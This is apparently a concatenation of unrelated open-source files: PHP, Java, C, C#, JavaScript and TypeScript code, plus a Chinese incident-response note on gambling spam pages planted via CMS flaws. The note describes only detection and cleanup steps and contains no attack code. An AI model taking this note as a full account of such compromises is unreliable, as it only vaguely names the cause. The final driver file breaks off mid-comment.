<?php /** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * package Netzarbeiter_CustomerActivation * copyright Copyright (c) 2014 Vinai Kopp http://netzarbeiter.com/ * license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) */ class Netzarbeiter_CustomerActivation_Model_Observer { const XML_PATH_ALWAYS_NOTIFY_ADMIN = 'customer/customeractivation/always_send_admin_email'; /** * Fired on customer_login event * Check if the customer has been activated (via adminhtml) * If not, through login error * * @param Varien_Event_Observer $observer */ public function customerLogin($observer) { $helper = Mage::helper('customeractivation'); if (!$helper->isModuleActive()) { return; } if ($this->_isApiRequest()) { return; } $customer = $observer->getEvent()->getCustomer(); $session = Mage::getSingleton('customer/session'); if (!$customer->getCustomerActivated()) { /* * Fake the old logout() method without deleting the session and all messages */ $session->setCustomer(Mage::getModel('customer/customer')) ->setId(null) ->setCustomerGroupId(Mage_Customer_Model_Group::NOT_LOGGED_IN_ID); if ($this->_checkRequestRoute('customer', 'account', 'createpost')) { /* * If this is a regular registration, simply display message */ $message = $helper->__('Please wait for your account to be activated'); $session->addSuccess($message); } else { /* * All other types of login */ Mage::throwException($helper->__('This account is not activated.')); } } } /** * Flag new accounts as such * * @param Varien_Event_Observer $observer */ public function customerSaveBefore($observer) { $customer = $observer->getEvent()->getCustomer(); $helper = Mage::helper('customeractivation'); $storeId = $helper->getCustomerStoreId($customer); if (!$helper->isModuleActive($storeId)) { return; } if (!$customer->getId()) { $customer->setCustomerActivationNewAccount(true); if ($this->shouldSetDefaultActivationStatus()) { $groupId = $customer->getGroupId(); $defaultStatus = $helper->getDefaultActivationStatus($groupId, $storeId); $customer->setCustomerActivated($defaultStatus); if (!$defaultStatus) { // Suppress the "enter your billing address for VAT validation" message. // This setting will not be saved, its just for this request. $helper = Mage::helper('customer/address'); if (method_exists($helper, 'isVatValidationEnabled')) { if (is_callable(array($helper, 'isVatValidationEnabled'))) { if (Mage::helper('customer/address')->isVatValidationEnabled($storeId)) { Mage::app()->getStore($storeId)->setConfig( Mage_Customer_Helper_Address::XML_PATH_VAT_VALIDATION_ENABLED, false ); } } } } } } } /** * Send out emails * * @param Varien_Event_Observer $observer */ public function customerSaveAfter($observer) { /** @var Mage_Customer_Model_Customer $customer */ $customer = $observer->getEvent()->getCustomer(); $helper = Mage::helper('customeractivation'); $storeId = $helper->getCustomerStoreId($customer); if (!$helper->isModuleActive($storeId)) { return; } $groupId = $customer->getGroupId(); $defaultStatus = $helper->getDefaultActivationStatus($groupId, $storeId); try { if (Mage::app()->getStore()->isAdmin()) { if (!$customer->getOrigData('customer_activated') && $customer->getCustomerActivated()) { // Send customer email only if it isn't a new account and it isn't activated by default if (!($customer->getCustomerActivationNewAccount() && $defaultStatus)) { $helper->sendCustomerNotificationEmail($customer); } } } else { if ($customer->getCustomerActivationNewAccount()) { // Only notify the admin if the default is deactivated or the "always notify" flag is configured $alwaysNotify = Mage::getStoreConfig(self::XML_PATH_ALWAYS_NOTIFY_ADMIN, $storeId); if (!$defaultStatus || $alwaysNotify) { $helper->sendAdminNotificationEmail($customer); } } $customer->setCustomerActivationNewAccount(false); } } catch (Exception $e) { Mage::throwException($e->getMessage()); } } public function salesConvertQuoteAddressToOrder(Varien_Event_Observer $observer) { /** @var $address Mage_Sales_Model_Quote_Address */ $address = $observer->getEvent()->getAddress(); $this->_abortCheckoutRegistration($address->getQuote()); } /** * Abort registration during checkout if default activation status is false. * * Should work with: onepage checkout, multishipping checkout and custom * checkout types, as long as they use the standard converter model * Mage_Sales_Model_Convert_Quote. * * Expected state after checkout: * - Customer saved * - No order placed * - Guest quote still contains items * - Customer quote contains no items * - Customer redirected to login page * - Customer sees message * * @param Mage_Sales_Model_Quote $quote */ protected function _abortCheckoutRegistration(Mage_Sales_Model_Quote $quote) { $helper = Mage::helper('customeractivation'); if (!$helper->isModuleActive($quote->getStoreId())) { return; } if ($this->_isApiRequest()) { return; } if (!Mage::getSingleton('customer/session')->isLoggedIn() && !$quote->getCustomerIsGuest()) { // Order is being created by non-activated customer $customer = $quote->getCustomer()->save(); if (!$customer->getCustomerActivated()) { // Abort order placement // Exception handling can not be assumed to be useful // Todo: merge guest quote to customer quote and save customer quote, but don't log customer in // Add message $message = $helper->__( 'Please wait for your account to be activated, then log in and continue with the checkout' ); Mage::getSingleton('core/session')->addSuccess($message); // Handle redirect to login page $targetUrl = Mage::getUrl('customer/account/login'); $response = Mage::app()->getResponse(); if (Mage::app()->getRequest()->isAjax()) { // Assume one page checkout $result = array('redirect' => $targetUrl); $response->setBody(Mage::helper('core')->jsonEncode($result)); } else { if ($response->canSendHeaders(true)) { // Assume multishipping checkout $response->clearHeader('location') ->setRedirect($targetUrl); } } $response->sendResponse(); /* ugly, but we need to stop the further order processing */ exit(); } } } /** * Return true if the request is made via the api * * @return boolean */ protected function _isApiRequest() { return Mage::app()->getRequest()->getModuleName() === 'api'; } /** * Check the current module, controller and action against the given values. * * @param string $module * @param string $controller * @param string $action * @return bool */ protected function _checkRequestRoute($module, $controller, $action) { $req = Mage::app()->getRequest(); if (strtolower($req->getModuleName()) == $module && strtolower($req->getControllerName()) == $controller && strtolower($req->getActionName()) == $action ) { return true; } return false; } /** * Check the current controller and action match the passed names * * @param string $controller * @param string $action * @return bool */ protected function _checkControllerAction($controller, $action) { $req = Mage::app()->getRequest(); return $this->_checkRequestRoute($req->getModuleName(), $controller, $action); } /** * Add customer activation option to the mass action block. * * This can't be done during the block abstract event * * @param Varien_Event_Observer $observer */ public function adminhtmlBlockHtmlBefore(Varien_Event_Observer $observer) { // Check the grid is the customer grid if ($observer->getBlock()->getId() != 'customerGrid') { return; } // Check if there is a massaction block and if yes, add the massaction for customeractivation $massBlock = $observer->getBlock()->getMassactionBlock(); if ($massBlock) { /** @var $helper Netzarbeiter_CustomerActivation_Helper_Data */ $helper = Mage::helper('customeractivation'); if (!$helper->isModuleActiveInAdmin()) { return; } $noEmail = Netzarbeiter_CustomerActivation_Helper_Data::STATUS_ACTIVATE_WITHOUT_EMAIL; $withEmail = Netzarbeiter_CustomerActivation_Helper_Data::STATUS_ACTIVATE_WITH_EMAIL; $deactivate = Netzarbeiter_CustomerActivation_Helper_Data::STATUS_DEACTIVATE; $massBlock->addItem( 'customer_activated', array( 'label' => $helper->__('Customer Activated'), 'url' => Mage::getUrl('adminhtml/customerActivation/massActivation'), 'additional' => array( 'status' => array( 'name' => 'customer_activated', 'type' => 'select', 'class' => 'required-entry', 'label' => $helper->__('Customer Activated'), 'values' => array( $noEmail => $helper->__('Yes (No Notification)'), $withEmail => $helper->__('Yes (With Notification)'), $deactivate => $helper->__('No') ) ) ) ) ); } } /** * Add the customer_activated attribute to the customer grid collection * * @param Varien_Event_Observer $observer */ public function eavCollectionAbstractLoadBefore(Varien_Event_Observer $observer) { if (!Mage::helper('customeractivation')->isModuleActiveInAdmin()) { return; } if (Mage::app()->getRequest()->getControllerName() !== 'customer') { return; } /** @var $collection Mage_Customer_Model_Resource_Customer_Collection */ $collection = $observer->getEvent()->getCollection(); // Only add attribute to customer collections $customerTypeId = Mage::getSingleton('eav/config')->getEntityType('customer')->getId(); $collectionTypeId = $collection->getEntity()->getTypeId(); if ($customerTypeId == $collectionTypeId) { $collection->addAttributeToSelect('customer_activated'); } } /** * Add customer_activated column to CSV and XML exports * * @param Varien_Event_Observer $observer */ public function coreBlockAbstractPrepareLayoutAfter(Varien_Event_Observer $observer) { if (!Mage::helper('customeractivation')->isModuleActiveInAdmin()) { return; } if (Mage::app()->getRequest()->getControllerName() !== 'customer') { return; } $block = $observer->getBlock(); if ($block->getType() === 'adminhtml/customer_grid') { // I don't think we need to limit applying the column by action //$action = Mage::app()->getRequest()->getActionName(); //if (in_array($action, array('grid', 'index', 'exportCsv', 'exportXml'))) { $this->_addActivationStatusColumn($block); //} } } /** * Add the activation status column to the customer grid block. * * This is used from different events when displaying the block as well as * during exporting the grid to CSV or XML. * * @param Mage_Adminhtml_Block_Widget_Grid $block */ protected function _addActivationStatusColumn(Mage_Adminhtml_Block_Widget_Grid $block) { /** @var $helper Netzarbeiter_CustomerActivation_Helper_Data */ $helper = Mage::helper('customeractivation'); // Add the attribute as a column to the grid $block->addColumnAfter( 'customer_activated', array( 'header' => $helper->__('Customer Activated'), 'align' => 'center', 'width' => '80px', 'type' => 'options', 'options' => array( '0' => $helper->__('No'), '1' => $helper->__('Yes') ), 'default' => '0', 'index' => 'customer_activated', 'renderer' => 'customeractivation/adminhtml_widget_grid_column_renderer_boolean' ), 'customer_since' ); // Set the new columns order.. otherwise our column would be the last one $block->sortColumnsByOrder(); } /** * Reportedly on Magento 1.6 customers are logged in automatically * by the lost password functionality (must be some customization actually). * * This observer method removes the customer id from the customer/session, * in effect causing a logout just in case. * * @param Varien_Event_Observer $observer */ public function controllerActionPostdispatchCustomerAccountResetPasswordPost(Varien_Event_Observer $observer) { if (!Mage::helper('customeractivation')->isModuleActive()) { return; } if (version_compare(Mage::getVersion(), '1.7', '<')) { $session = Mage::getSingleton('customer/session'); $customer = $session->getCustomer(); if (!$customer->getCustomerActivated() && $session->isLoggedIn()) { $session->setCustomerId(null)->setId(null); } } } private function shouldSetDefaultActivationStatus() { return !$this->isAdminEditCustomerSaveAction() && !$this->_isApiRequest(); } private function isAdminEditCustomerSaveAction() { return Mage::app()->getStore()->isAdmin() && $this->_checkControllerAction('customer', 'save'); } }
{ "pile_set_name": "Github" }
package org.dimdev.utils; import java.util.HashMap; import java.util.Map; public class InstanceMap { // Type-safe map between classes and instances private Map<Class<?>, Object> uncheckedMap = new HashMap<>(); public <T> void put(Class<T> key, T value) { uncheckedMap.put(key, value); } public void castAndPut(Class<?> key, Object value) { uncheckedMap.put(key, key.cast(value)); } public <T> T get(Class<T> key) { //noinspection unchecked return (T) uncheckedMap.get(key); } public <T> T remove(Class<T> key) { //noinspection unchecked return (T) uncheckedMap.remove(key); } public void clear() { uncheckedMap.clear(); } public boolean containsKey(Class<?> key) { return uncheckedMap.containsKey(key); } public boolean containsValue(Object value) { return uncheckedMap.containsValue(value); } }
{ "pile_set_name": "Github" }
/* * Copyright (c) 1991-1994 by Xerox Corporation. All rights reserved. * Copyright (c) 1996-1999 by Silicon Graphics. All rights reserved. * Copyright (c) 1999-2003 by Hewlett-Packard Company. All rights reserved. * * * THIS MATERIAL IS PROVIDED AS IS, WITH ABSOLUTELY NO WARRANTY EXPRESSED * OR IMPLIED. ANY USE IS AT YOUR OWN RISK. * * Permission is hereby granted to use or copy this program * for any purpose, provided the above notices are retained on all copies. * Permission to modify the code and to distribute modified code is granted, * provided the above notices are retained, and a notice that the code was * modified is included with the above copyright notice. * * Some of the machine specific code was borrowed from our GC distribution. */ #include "../all_aligned_atomic_load_store.h" /* Real X86 implementations, appear */ /* to enforce ordering between memory operations, EXCEPT that a later */ /* read can pass earlier writes, presumably due to the visible */ /* presence of store buffers. */ /* We ignore the fact that the official specs */ /* seem to be much weaker (and arguably too weak to be usable). */ #include "../ordered_except_wr.h" #include "../test_and_set_t_is_char.h" #include "../standard_ao_double_t.h" AO_INLINE void AO_nop_full(void) { /* Note: "mfence" (SSE2) is supported on all x86_64/amd64 chips. */ __asm__ __volatile__ ("mfence" : : : "memory"); } #define AO_HAVE_nop_full /* As far as we can tell, the lfence and sfence instructions are not */ /* currently needed or useful for cached memory accesses. */ AO_INLINE AO_t AO_fetch_and_add_full (volatile AO_t *p, AO_t incr) { AO_t result; __asm__ __volatile__ ("lock; xaddq %0, %1" : "=r" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */ : "memory"); return result; } #define AO_HAVE_fetch_and_add_full AO_INLINE unsigned char AO_char_fetch_and_add_full (volatile unsigned char *p, unsigned char incr) { unsigned char result; __asm__ __volatile__ ("lock; xaddb %0, %1" : "=q" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */ : "memory"); return result; } #define AO_HAVE_char_fetch_and_add_full AO_INLINE unsigned short AO_short_fetch_and_add_full (volatile unsigned short *p, unsigned short incr) { unsigned short result; __asm__ __volatile__ ("lock; xaddw %0, %1" : "=r" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */ : "memory"); return result; } #define AO_HAVE_short_fetch_and_add_full AO_INLINE unsigned int AO_int_fetch_and_add_full (volatile unsigned int *p, unsigned int incr) { unsigned int result; __asm__ __volatile__ ("lock; xaddl %0, %1" : "=r" (result), "=m" (*p) : "0" (incr) /* , "m" (*p) */ : "memory"); return result; } #define AO_HAVE_int_fetch_and_add_full AO_INLINE void AO_or_full (volatile AO_t *p, AO_t incr) { __asm__ __volatile__ ("lock; orq %1, %0" : "=m" (*p) : "r" (incr) /* , "m" (*p) */ : "memory"); } #define AO_HAVE_or_full AO_INLINE AO_TS_VAL_t AO_test_and_set_full (volatile AO_TS_t *addr) { AO_TS_t oldval; /* Note: the "xchg" instruction does not need a "lock" prefix */ __asm__ __volatile__ ("xchg %b0, %1" : "=q"(oldval), "=m"(*addr) : "0"(0xff) /* , "m"(*addr) */ : "memory"); return (AO_TS_VAL_t)oldval; } #define AO_HAVE_test_and_set_full /* Returns nonzero if the comparison succeeded. */ AO_INLINE int AO_compare_and_swap_full (volatile AO_t *addr, AO_t old, AO_t new_val) { char result; __asm__ __volatile__ ("lock; cmpxchgq %2, %0; setz %1" : "=m"(*addr), "=a"(result) : "r" (new_val), "a"(old) : "memory"); return (int) result; } #define AO_HAVE_compare_and_swap_full #ifdef AO_CMPXCHG16B_AVAILABLE /* NEC LE-IT: older AMD Opterons are missing this instruction. * On these machines SIGILL will be thrown. * Define AO_WEAK_DOUBLE_CAS_EMULATION to have an emulated * (lock based) version available */ /* HB: Changed this to not define either by default. There are * enough machines and tool chains around on which cmpxchg16b * doesn't work. And the emulation is unsafe by our usual rules. * However both are clearly useful in certain cases. */ AO_INLINE int AO_compare_double_and_swap_double_full (volatile AO_double_t *addr, AO_t old_val1, AO_t old_val2, AO_t new_val1, AO_t new_val2) { char result; __asm__ __volatile__ ("lock; cmpxchg16b %0; setz %1" : "=m"(*addr), "=a"(result) : /* "m" (*addr), */ "d" (old_val2), "a" (old_val1), "c" (new_val2), "b" (new_val1) : "memory"); return (int) result; } #define AO_HAVE_compare_double_and_swap_double_full #else /* this one provides spinlock based emulation of CAS implemented in */ /* atomic_ops.c. We probably do not want to do this here, since it is */ /* not atomic with respect to other kinds of updates of *addr. On the */ /* other hand, this may be a useful facility on occasion. */ #ifdef AO_WEAK_DOUBLE_CAS_EMULATION int AO_compare_double_and_swap_double_emulation(volatile AO_double_t *addr, AO_t old_val1, AO_t old_val2, AO_t new_val1, AO_t new_val2); AO_INLINE int AO_compare_double_and_swap_double_full(volatile AO_double_t *addr, AO_t old_val1, AO_t old_val2, AO_t new_val1, AO_t new_val2) { return AO_compare_double_and_swap_double_emulation(addr, old_val1, old_val2, new_val1, new_val2); } #define AO_HAVE_compare_double_and_swap_double_full #endif /* AO_WEAK_DOUBLE_CAS_EMULATION */ #endif /* AO_CMPXCHG16B_AVAILABLE */
{ "pile_set_name": "Github" }
using System; using WampSharp.Core.Listener; using WampSharp.Core.Proxy; using WampSharp.V1.Core.Contracts; using WampSharp.V1.Core.Curie; using WampSharp.V1.Cra; namespace WampSharp.V1.Core.Listener.ClientBuilder { internal class WampClientProxy : WampClientProxyBase, IWampClient, IDisposable, IWampCurieMapper, IWampConnectionMonitor { private readonly IWampCurieMapper mCurieMapper = new WampCurieMapper(); private readonly IWampConnectionMonitor mMonitor; private readonly IDisposable mDisposable; public WampClientProxy(IWampOutgoingMessageHandler messageHandler, IWampOutgoingRequestSerializer requestSerializer, IWampConnectionMonitor monitor, IDisposable disposable) : base(messageHandler, requestSerializer) { mMonitor = monitor; mDisposable = disposable; } public string SessionId { get; set; } public IWampCraAuthenticator CraAuthenticator { get; set; } public void Dispose() { mDisposable?.Dispose(); } public string Resolve(string curie) { return mCurieMapper.Resolve(curie); } public void Map(string prefix, string uri) { mCurieMapper.Map(prefix, uri); } public event EventHandler ConnectionClosed { add => mMonitor.ConnectionClosed += value; remove => mMonitor.ConnectionClosed -= value; } public bool Connected => mMonitor.Connected; } }
{ "pile_set_name": "Github" }
/*! * Angular Material Design * https://github.com/angular/material * @license MIT * v1.0.6 */ goog.provide('ng.material.components.fabActions'); goog.require('ng.material.core'); (function() { 'use strict'; /** * @ngdoc module * @name material.components.fabActions */ angular .module('material.components.fabActions', ['material.core']) .directive('mdFabActions', MdFabActionsDirective); /** * @ngdoc directive * @name mdFabActions * @module material.components.fabActions * * @restrict E * * @description * The `<md-fab-actions>` directive is used inside of a `<md-fab-speed-dial>` or * `<md-fab-toolbar>` directive to mark an element (or elements) as the actions and setup the * proper event listeners. * * @usage * See the `<md-fab-speed-dial>` or `<md-fab-toolbar>` directives for example usage. */ function MdFabActionsDirective() { return { restrict: 'E', require: ['^?mdFabSpeedDial', '^?mdFabToolbar'], compile: function(element, attributes) { var children = element.children(); var hasNgRepeat = false; angular.forEach(['', 'data-', 'x-'], function(prefix) { hasNgRepeat = hasNgRepeat || (children.attr(prefix + 'ng-repeat') ? true : false); }); // Support both ng-repeat and static content if (hasNgRepeat) { children.addClass('md-fab-action-item'); } else { // Wrap every child in a new div and add a class that we can scale/fling independently children.wrap('<div class="md-fab-action-item">'); } } } } })(); ng.material.components.fabActions = angular.module("material.components.fabActions");
{ "pile_set_name": "Github" }
## 第3篇:批量挂黑页 作为一个网站管理员,你采用开源CMS做网站,比如dedecms,但是有一天,你忽然发现不知何时,网站的友情链接模块被挂大量垃圾链接,网站出现了很多不该有的目录,里面全是博彩相关的网页。而且,攻击者在挂黑页以后,会在一些小论坛注册马甲将你的网站黑页链接发到论坛,引爬虫收录。在搜索引擎搜索网站地址时,收录了一些会出现一些博彩页面,严重影响了网站形象。 ### 原因分析 网站存在高危漏洞,常见于一些存在安全漏洞的开源CMS,利用0day批量拿站上传黑页。 ### 现象描述: 某网站被挂了非常多博彩链接,链接形式如下: ​ <http://www.xxx.com/upload/aomendduchangzaixiandobo/index.html> ​ <http://www.xxx.com/upload/aomendduchangzaixian/index.html> ​ <http://www.xxx.com/upload/aomenzhengguidubowangzhan/index.html> 链接可以访问,直接访问物理路径也可以看到文件,但是打开网站目录并没有发现这些文件,这些文件到底藏在了哪? 访问这些链接,跳转到如图页面: ![](./image/3-1.png) ### 问题处理: 1、打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件、文件夹和驱动器”。 ![](./image/3-2.png) 2、再次查看,可以看到半透明的文件夹,清楚隐藏文件夹及所有页面 ![](./image/3-3.png) 3、然后清除IIS临时压缩文件 C:\inetpub\temp\IIS Temporary Compressed Files\WEBUI\$^_gzip_D^\WEB\WEBUI\UPLOAD ![](./image/3-4.png) 4、投诉快照,申请删除相关的网页收录,减少对网站的影响。
{ "pile_set_name": "Github" }
#ifndef _SERIALIB_H #define _SERIALIB_H #include <sys/time.h> #include <stdlib.h> #include <sys/types.h> #include <sys/shm.h> #include <termios.h> #include <string.h> #include <fcntl.h> #include <stdio.h> typedef struct serial_s { speed_t baud; char* port; int fd; } serial; int serial_open(serial **s, char* port, int baud); int serial_read_char(serial *s, char *p); int serial_read(serial *s, char *buf, char eol, unsigned int len); int serial_write_char(serial *s, char p); int serial_write(serial *s, char* str); typedef struct timeval timer; void timer_init(timer **t); unsigned long int timer_elapsed(timer *t); #endif
{ "pile_set_name": "Github" }
/** * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. */ package com.microsoft.azure.management.network.v2019_04_01; import java.util.List; import com.fasterxml.jackson.annotation.JsonProperty; /** * Rewrite rule of an application gateway. */ public class ApplicationGatewayRewriteRule { /** * Name of the rewrite rule that is unique within an Application Gateway. */ @JsonProperty(value = "name") private String name; /** * Rule Sequence of the rewrite rule that determines the order of execution * of a particular rule in a RewriteRuleSet. */ @JsonProperty(value = "ruleSequence") private Integer ruleSequence; /** * Conditions based on which the action set execution will be evaluated. */ @JsonProperty(value = "conditions") private List<ApplicationGatewayRewriteRuleCondition> conditions; /** * Set of actions to be done as part of the rewrite Rule. */ @JsonProperty(value = "actionSet") private ApplicationGatewayRewriteRuleActionSet actionSet; /** * Get name of the rewrite rule that is unique within an Application Gateway. * * @return the name value */ public String name() { return this.name; } /** * Set name of the rewrite rule that is unique within an Application Gateway. * * @param name the name value to set * @return the ApplicationGatewayRewriteRule object itself. */ public ApplicationGatewayRewriteRule withName(String name) { this.name = name; return this; } /** * Get rule Sequence of the rewrite rule that determines the order of execution of a particular rule in a RewriteRuleSet. * * @return the ruleSequence value */ public Integer ruleSequence() { return this.ruleSequence; } /** * Set rule Sequence of the rewrite rule that determines the order of execution of a particular rule in a RewriteRuleSet. * * @param ruleSequence the ruleSequence value to set * @return the ApplicationGatewayRewriteRule object itself. */ public ApplicationGatewayRewriteRule withRuleSequence(Integer ruleSequence) { this.ruleSequence = ruleSequence; return this; } /** * Get conditions based on which the action set execution will be evaluated. * * @return the conditions value */ public List<ApplicationGatewayRewriteRuleCondition> conditions() { return this.conditions; } /** * Set conditions based on which the action set execution will be evaluated. * * @param conditions the conditions value to set * @return the ApplicationGatewayRewriteRule object itself. */ public ApplicationGatewayRewriteRule withConditions(List<ApplicationGatewayRewriteRuleCondition> conditions) { this.conditions = conditions; return this; } /** * Get set of actions to be done as part of the rewrite Rule. * * @return the actionSet value */ public ApplicationGatewayRewriteRuleActionSet actionSet() { return this.actionSet; } /** * Set set of actions to be done as part of the rewrite Rule. * * @param actionSet the actionSet value to set * @return the ApplicationGatewayRewriteRule object itself. */ public ApplicationGatewayRewriteRule withActionSet(ApplicationGatewayRewriteRuleActionSet actionSet) { this.actionSet = actionSet; return this; } }
{ "pile_set_name": "Github" }
import * as React from 'react' import { Row, Select, Button } from 'antd' import { origin, colors as C } from '../../config' import './AlertURLDetail.css' interface P { alertURL: string } interface S { recipients: string[] result: any isSending: boolean } export default class AlertURLDetail extends React.Component<P, S> { state: S = { recipients: [], result: {}, isSending: false, } getRequestOutput() { const result = this.state.result switch (result.status) { case 'OK': return ( <span style={{ color: [C.cyan, C.blue, C.green, C.yellow, C.red, C.pink][ Math.floor(result.statusCode / 100) ], }} > {result.statusCode} {result.statusText} </span> ) case 'Error': return ( <span style={{ color: C.red }}> {result.name}: {result.message} </span> ) default: return '' } } send = () => { this.setState({ isSending: true }) fetch(`${origin}/settings/test`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ alertURL: this.props.alertURL, recipients: this.state.recipients, }), }) .then(res => res.json()) .then(result => { this.setState({ isSending: false, result, }) }) } update = (recipients: string[]) => { this.setState({ recipients }) } render() { return ( <div className="alerturldetail"> <pre> POST {this.props.alertURL} <br /> Content-Type: application/json <br /> <br /> {JSON.stringify( { recipients: this.state.recipients, name: '查询当前时间', URL: 'https://your.server/your/api', status: 'Error', statusCode: 200, responseTime: 53, now: 1484292986935, errName: 'AssertionError', errMessage: '慢了123秒', body: '{now:1484292863588}', readType: 'json', testCase: 'const d = Date.now() - body.now\nassert(d < 60000, `慢了${d/1000|0}秒`)', }, null, 2, )} </pre> <Row type="flex" justify="space-between" className="row"> <Select placeholder="告警接收人" mode="tags" size="large" onChange={this.update} tokenSeparators={[',', ' ']} /> <Button size="large" icon="rocket" loading={this.state.isSending} onClick={this.send} > 测试 </Button> </Row> <div style={{ lineHeight: '32px' }}>{this.getRequestOutput()}</div> <pre>{this.state.result.body}</pre> </div> ) } }
{ "pile_set_name": "Github" }
/******************************************************************************* Copyright (C) Marvell International Ltd. and its affiliates This software file (the "File") is owned and distributed by Marvell International Ltd. and/or its affiliates ("Marvell") under the following alternative licensing terms. Once you have made an election to distribute the File under one of the following license alternatives, please (i) delete this introductory statement regarding license alternatives, (ii) delete the two license alternatives that you have not elected to use and (iii) preserve the Marvell copyright notice above. ******************************************************************************** Marvell Commercial License Option If you received this File from Marvell and you have entered into a commercial license agreement (a "Commercial License") with Marvell, the File is licensed to you under the terms of the applicable Commercial License. ******************************************************************************** Marvell GPL License Option If you received this File from Marvell, you may opt to use, redistribute and/or modify this File in accordance with the terms and conditions of the General Public License Version 2, June 1991 (the "GPL License"), a copy of which is available along with the File in the license.txt file or by writing to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 or on the worldwide web at http://www.gnu.org/licenses/gpl.txt. THE FILE IS DISTRIBUTED AS-IS, WITHOUT WARRANTY OF ANY KIND, AND THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE ARE EXPRESSLY DISCLAIMED. The GPL License provides additional details about this warranty disclaimer. ******************************************************************************** Marvell BSD License Option If you received this File from Marvell, you may opt to use, redistribute and/or modify this File under the following licensing terms. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Marvell nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *******************************************************************************/ #include "gpp/mvGpp.h" #include "ctrlEnv/mvCtrlEnvLib.h" /* defines */ #ifdef MV_DEBUG #define DB(x) x #else #define DB(x) #endif static MV_VOID gppRegSet(MV_U32 group, MV_U32 regOffs,MV_U32 mask,MV_U32 value); /******************************************************************************* * mvGppTypeSet - Enable a GPP (OUT) pin * * DESCRIPTION: * * INPUT: * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the type * of corresponding GPP will be set. Other GPPs are ignored. * value - 32bit value that describes GPP type per pin. * * OUTPUT: * None. * * EXAMPLE: * Set GPP8 to input and GPP15 to output. * mvGppTypeSet(0, (GPP8 | GPP15), * ((MV_GPP_IN & GPP8) | (MV_GPP_OUT & GPP15)) ); * * RETURN: * None. * *******************************************************************************/ MV_STATUS mvGppTypeSet(MV_U32 group, MV_U32 mask, MV_U32 value) { if (group >= MV_GPP_MAX_GROUP) { DB(mvOsPrintf("mvGppTypeSet: ERR. invalid group number \n")); return MV_BAD_PARAM; } gppRegSet(group, GPP_DATA_OUT_EN_REG(group), mask, value); /* Workaround for Erratum FE-MISC-70*/ if(mvCtrlRevGet()==MV_88F6XXX_A0_REV && (group == 1)) { mask &= 0x2; gppRegSet(0, GPP_DATA_OUT_EN_REG(0), mask, value); } /*End of WA*/ return MV_OK; } /******************************************************************************* * mvGppBlinkEn - Set a GPP (IN) Pin list to blink every ~100ms * * DESCRIPTION: * * INPUT: * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the type * of corresponding GPP will be set. Other GPPs are ignored. * value - 32bit value that describes GPP blink per pin. * * OUTPUT: * None. * * EXAMPLE: * Set GPP8 to be static and GPP15 to be blinking. * mvGppBlinkEn(0, (GPP8 | GPP15), * ((MV_GPP_OUT_STATIC & GPP8) | (MV_GPP_OUT_BLINK & GPP15)) ); * * RETURN: * None. * *******************************************************************************/ MV_STATUS mvGppBlinkEn(MV_U32 group, MV_U32 mask, MV_U32 value) { if (group >= MV_GPP_MAX_GROUP) { DB(mvOsPrintf("mvGppBlinkEn: ERR. invalid group number \n")); return MV_BAD_PARAM; } gppRegSet(group, GPP_BLINK_EN_REG(group), mask, value); return MV_OK; } /******************************************************************************* * mvGppPolaritySet - Set a GPP (IN) Pin list Polarity mode * * DESCRIPTION: * * INPUT: * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the type * of corresponding GPP will be set. Other GPPs are ignored. * value - 32bit value that describes GPP polarity per pin. * * OUTPUT: * None. * * EXAMPLE: * Set GPP8 to the actual pin value and GPP15 to be inverted. * mvGppPolaritySet(0, (GPP8 | GPP15), * ((MV_GPP_IN_ORIGIN & GPP8) | (MV_GPP_IN_INVERT & GPP15)) ); * * RETURN: * None. * *******************************************************************************/ MV_STATUS mvGppPolaritySet(MV_U32 group, MV_U32 mask, MV_U32 value) { if (group >= MV_GPP_MAX_GROUP) { DB(mvOsPrintf("mvGppPolaritySet: ERR. invalid group number \n")); return MV_BAD_PARAM; } gppRegSet(group, GPP_DATA_IN_POL_REG(group), mask, value); return MV_OK; } /******************************************************************************* * mvGppPolarityGet - Get a value of relevant bits from GPP Polarity register. * * DESCRIPTION: * * INPUT: * group - GPP group number * mask - 32bit mask value. Each set bit in the mask means that the * returned value is valid for it. * * OUTPUT: * None. * * 